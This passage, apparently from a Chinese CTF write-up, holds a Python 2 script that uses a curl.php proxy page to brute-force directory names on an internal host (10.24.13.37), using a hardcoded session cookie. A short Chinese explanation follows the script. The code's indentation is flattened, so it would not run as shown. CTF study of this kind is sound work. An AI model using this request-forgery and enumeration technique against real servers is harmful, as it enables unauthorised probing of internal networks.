http://p6.qhimg.com/t0170ec7638e15c209c.jpg
//爆破篇章
import requests
headers = {
'Cookie': 'PHPSESSID=cfefaa8e1d72885a3de880a9c9c55337'
}
url = 'http://vpn.sycsec.com/curl.php'
url_2 = 'http://10.24.13.37/files/'
data = {
'option': 'GET',
'url': '',
'cookie': '',
'post': '',
}
for i in range(0,84):
data['url'] = '%sSYC0%02d/' % (url_2, i)
print 'Forbidden' in requests.post(url, headers=headers, data=data).content, i
通过Python脚本使用requests库实现对指定URL的文件目录进行爆破尝试。每轮循环修改目标URL中的文件夹编号并发送POST请求,判断响应内容中是否包含'Forbidden'关键字。
618

被折叠的 条评论
为什么被折叠?



